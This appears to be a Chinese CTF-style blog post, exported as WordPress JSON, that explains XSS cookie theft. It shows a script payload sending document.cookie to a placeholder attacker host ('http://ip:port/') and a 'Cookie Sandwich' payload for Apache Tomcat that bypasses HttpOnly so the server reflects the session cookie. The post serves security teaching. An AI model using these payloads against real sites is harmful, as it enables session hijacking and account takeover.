{"id":229,"date":"2025-11-07T17:03:18","date_gmt":"2025-11-07T17:03:18","guid":{"rendered":"http:\/\/101.42.175.115\/wordpress\/?p=229"},"modified":"2026-01-07T11:55:13","modified_gmt":"2026-01-07T11:55:13","slug":"xss-cookie","status":"publish","type":"post","link":"http:\/\/101.42.175.115\/wordpress\/?p=229","title":{"rendered":"XSS \u5b9e\u73b0 cookie \u7a83\u53d6"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">\u5e38\u89c4cookie\u7a83\u53d6<\/h2>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">JavaScript<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly># \u83b7\u53d6\u5f53\u524d\u9875\u9762\u7684 cookie\n&lt;script>const cookie=document.cookie;window.location.href='http:\/\/ip:port\/'+encodeURIComponent(cookie);&lt;\/script><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\"># <\/span><span style=\"color: #B07D48\">\u83b7\u53d6\u5f53\u524d\u9875\u9762\u7684<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B07D48\">cookie<\/span><\/span>\n<span class=\"line\"><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">script<\/span><span style=\"color: #999999\">&gt;<\/span><span style=\"color: #393A34\">const cookie=document.cookie;window.location.href=&#39;http:\/\/ip:port\/&#39;+encodeURIComponent(cookie);<\/span><span style=\"color: #999999\">&lt;\/<\/span><span style=\"color: #1E754F\">script<\/span><span style=\"color: #999999\">&gt;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">JavaScript<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u6765\u770b\u8fd9\u4e2a payload\uff0c<code>document.cookie<\/code> \u83b7\u53d6 cookie\uff0c\u518d\u901a\u8fc7\u8bbf\u95ee\u653b\u51fb\u673a\u8bfb\u53d6\u9776\u673a\u53d1\u9001\u7684 cookie \u4fe1\u606f\u3002\u53ea\u8981\u7ba1\u7406\u5458\u7528\u6237\u6267\u884c\u4e86\u8fd9\u6bb5 JavaScript \u4ee3\u7801\u5c31\u80fd\u5b9e\u73b0 cookie \u7684\u7a83\u53d6\u3002<\/p>\n\n\n\n<div style=\"height:42px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">HttpOnly_cookie\u7a83\u53d6<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">HttpOnly<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>HttpOnly<\/strong> \u662f\u4e00\u79cd Web \u5b89\u5168\u529f\u80fd\uff0c\u901a\u5e38\u7528\u4e8e HTTP \u54cd\u5e94\u4e2d\u7684 <strong>Set-Cookie<\/strong> \u5934\u90e8\uff0c\u76ee\u7684\u662f\u589e\u5f3a\u6d4f\u89c8\u5668\u4e2d Cookie \u7684\u5b89\u5168\u6027\uff0c\u9632\u6b62\u5ba2\u6237\u7aef JavaScript \u8bbf\u95ee\u654f\u611f Cookie \u4fe1\u606f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0c\u901a\u8fc7 JavaScript \u53ef\u4ee5\u5b9e\u73b0\u8bbf\u95ee Cookie\uff08\u901a\u8fc7 <strong>document.cookie<\/strong> \u6216\u8005 <strong>fetch<\/strong>\uff09\u3002\u5982\u679c\u6076\u610f\u4ee3\u7801\uff08\u5982 XSS\uff09\u88ab\u6ce8\u5165\u5230\u7f51\u7ad9\u4e2d\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7 JavaScript \u83b7\u53d6\u8fd9\u4e9b Cookie \u4fe1\u606f\uff0c\u4ece\u800c\u5b9e\u73b0 cookie \u7a83\u53d6\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e3a\u9632\u6b62\u8fd9\u79cd\u60c5\u51b5\uff0c<strong>HttpOnly<\/strong> \u6807\u5fd7\u5141\u8bb8\u5f00\u53d1\u8005\u5c06 Cookie \u6807\u8bb0\u4e3a<strong>\u53ea\u53ef\u901a\u8fc7 HTTP \u8bf7\u6c42\u8bbf\u95ee<\/strong>\uff0c\u5373\u8be5 Cookie <strong>\u65e0\u6cd5\u901a\u8fc7 JavaScript \u8bbf\u95ee<\/strong>\u3002\u53ea\u6709 HTTP \u8bf7\u6c42\u624d\u80fd\u53d1\u9001\u5e26\u6709\u8be5 Cookie\u3002<\/p>\n\n\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Cookie Sandwich<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Cookie Sandwich<\/strong> \u5b9e\u73b0\u7684\u539f\u7406\u662f\u6d4f\u89c8\u5668\u4e0e\u670d\u52a1\u5668\u5bf9 cookie \u5934\u89e3\u6790\u7ec6\u8282\u7684\u5dee\u5f02\u3002\u653b\u51fb\u8005\u901a\u8fc7\u5728 cookie \u4e2d\u63d2\u5165<strong>\u5f15\u53f7\u548c\u7279\u6b8a cookie \u540d<\/strong>\uff08\u5982 $Version\uff09\uff0c\u8ba9\u670d\u52a1\u5668\u7684\u89e3\u6790\u5668\u628a<strong>\u771f\u6b63\u7684 HttpOnly cookie<\/strong> \u5f53\u4f5c\u88ab\u5939\u5728<strong>\u4e24\u6bb5\u7279\u6b8a\u6784\u9020\u7684 cookie<\/strong> \u4e2d\u95f4\u7684\u4e00\u6bb5\u6587\u672c\uff0c\u4ece\u800c\u4f7f HttpOnly \u5c5e\u6027\u5931\u6548\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u6211\u4eec\u6765\u770b\u4e00\u6bb5 <strong>Apache Tomcat<\/strong> \u4e0b\u7684 paylaod\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">JavaScript<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>document.cookie = `$Version=1; domain=${domain}; path=${path};`;\ndocument.cookie = `param1=\"start; domain=${domain}; path=${path};`;\ndocument.cookie = `param2=end\"; domain=${domain}; path=\/;`;<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #B07D48\">document<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #B07D48\">cookie<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B5695999\">`<\/span><span style=\"color: #B56959\">$Version=1; domain=<\/span><span style=\"color: #999999\">${<\/span><span style=\"color: #B56959\">domain<\/span><span style=\"color: #999999\">}<\/span><span style=\"color: #B56959\">; path=<\/span><span style=\"color: #999999\">${<\/span><span style=\"color: #B56959\">path<\/span><span style=\"color: #999999\">}<\/span><span style=\"color: #B56959\">;<\/span><span style=\"color: #B5695999\">`<\/span><span style=\"color: #999999\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B07D48\">document<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #B07D48\">cookie<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B5695999\">`<\/span><span style=\"color: #B56959\">param1=&quot;start; domain=<\/span><span style=\"color: #999999\">${<\/span><span style=\"color: #B56959\">domain<\/span><span style=\"color: #999999\">}<\/span><span style=\"color: #B56959\">; path=<\/span><span style=\"color: #999999\">${<\/span><span style=\"color: #B56959\">path<\/span><span style=\"color: #999999\">}<\/span><span style=\"color: #B56959\">;<\/span><span style=\"color: #B5695999\">`<\/span><span style=\"color: #999999\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B07D48\">document<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #B07D48\">cookie<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B5695999\">`<\/span><span style=\"color: #B56959\">param2=end&quot;; domain=<\/span><span style=\"color: #999999\">${<\/span><span style=\"color: #B56959\">domain<\/span><span style=\"color: #999999\">}<\/span><span style=\"color: #B56959\">; path=\/;<\/span><span style=\"color: #B5695999\">`<\/span><span style=\"color: #999999\">;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">JavaScript<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u518d\u770b\u4e00\u770b\u53ef\u80fd\u5b9e\u73b0\u7684\u6548\u679c\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">HTTP<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>GET \/ HTTP\/1.1\nCookie: $Version=1; param1=\"start; sessionId=secret; param2=end\"\n=>\nHTTP\/1.1 200 OK\nSet-Cookie: param1=\"start; sessionId=secret; param2=end\";<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #1E754F\">GET<\/span><span style=\"color: #393A34\"> \/ <\/span><span style=\"color: #1E754F\">HTTP<\/span><span style=\"color: #393A34\">\/<\/span><span style=\"color: #2F798A\">1.1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #1E754F\">Cookie:<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B56959\">$Version=1; param1=&quot;start; sessionId=secret; param2=end&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">=&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">HTTP\/1.1 200 OK<\/span><\/span>\n<span class=\"line\"><span style=\"color: #1E754F\">Set-Cookie:<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B56959\">param1=&quot;start; sessionId=secret; param2=end&quot;;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">HTTP<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5de5\u4f5c\u539f\u7406\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u670d\u52a1\u5668\u5728\u89e3\u6790 cookie \u65f6\uff0c\u5982\u679c cookie \u4ee5\u7279\u6b8a\u7684 <strong>$Version<\/strong> \u5c5e\u6027\u5f00\u5934\uff0c\u5219\u9ed8\u8ba4\u4f7f\u7528<strong>\u65e7\u5f0f\u89e3\u6790\u903b\u8f91<\/strong>\u3002\u5982\u679c cookie \u503c\u4ee5\u53cc\u5f15\u53f7\u5f00\u5934\uff0c\u5219\u4f1a\u7ee7\u7eed\u8bfb\u53d6\uff0c\u76f4\u5230\u9047\u5230\u4e0b\u4e00\u4e2a\u672a\u8f6c\u4e49\u7684\u53cc\u5f15\u53f7\u5b57\u7b26\u3002<\/li>\n\n\n\n<li>\u5bf9\u4e8e Cookie \u7684\u987a\u5e8f\uff0cpath \u5185\u5bb9\u591a\u7684\u4f1a\u6392\u5728\u524d\u9762\uff0c\u5148\u8bbe\u7f6e\u7684\u6392\u5728\u524d\u9762\u3002<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u901a\u8fc7\u5de7\u5999\u7684\u6784\u9020\u5b9e\u73b0\u539f\u9875\u9762\u7684 cookie \u4f4d\u4e8e\u6784\u9020 cookie \u7684\u4e2d\u95f4\uff0c\u670d\u52a1\u5668\u5728\u89e3\u6790\u65f6\u5c31\u80fd\u5b9e\u73b0\u539f\u9875\u9762\u7684 HttpOnly \u5c5e\u6027\u5931\u6548\uff0c\u4ece\u800c\u901a\u8fc7\u54cd\u5e94\u56de\u663e\u51fa\u6765\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"\u5e38\u89c4cookie\u7a83\u53d6 \u6765\u770b\u8fd9\u4e2a payload\uff0cdocument.cookie \u83b7\u53d6 cookie\uff0c\u518d\u901a\u8fc7\u8bbf\u95ee\u653b\u51fb\u673a\u8bfb\u53d6\u9776\u673a\u53d1\u9001\u7684 cookie \u4fe1\u606f\u3002\u53ea\u8981\u7ba1\u7406\u5458\u7528\u6237\u6267\u884c\u4e86\u8fd9\u6bb5 JavaScript \u4ee3\u7801\u5c31\u80fd\u5b9e\u73b0 cookie \u7684\u7a83\u53d6\u3002 H......","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[23],"tags":[33,9,34,32],"class_list":["post-229","post","type-post","status-publish","format-standard","hentry","category-web-security","tag-cookie","tag-ctf","tag-javascript","tag-xss"],"_links":{"self":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/229","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=229"}],"version-history":[{"count":10,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/229\/revisions"}],"predecessor-version":[{"id":503,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/229\/revisions\/503"}],"wp:attachment":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=229"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=229"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=229"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}